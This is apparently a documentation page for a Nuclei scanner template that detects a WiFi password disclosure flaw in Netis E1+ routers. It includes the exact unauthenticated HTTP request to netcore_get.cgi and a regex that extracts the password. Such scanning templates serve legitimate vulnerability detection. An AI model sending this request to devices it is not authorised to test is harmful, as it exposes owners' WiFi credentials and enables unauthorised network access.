Skip to content

Netis E1+ V1.2.32533 - WiFi Password Disclosure

ID: netis-info-leak

Severity: high

Author: gy741

Tags: netis,exposure,edb

A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.

id: netis-info-leak
info:
name: Netis E1+ V1.2.32533 - WiFi Password Disclosure
author: gy741
severity: high
description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device.
reference:
- https://www.exploit-db.com/exploits/48384
- https://www.netis-systems.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
max-request: 1
tags: netis,exposure,edb
http:
- raw:
- |
GET //netcore_get.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: homeFirstShow=yes
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "rp_ap_password"
- "rp_ap_ssid"
part: body
condition: and
extractors:
- type: regex
part: body
regex:
- "'rp_soon_password':'([A-Za-z0-9]+)'"
# digest: 490a00463044022014a57c0d2d1cfa555d3b9a8d981803fdeba7d85e65c458cf09bf6dc5a3ca45b90220315165b41bc9d37639b53c1fae11c829b364f700b092df0a30c8b7cf3b701f4e:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/netis-info-leak.yaml"

View on Github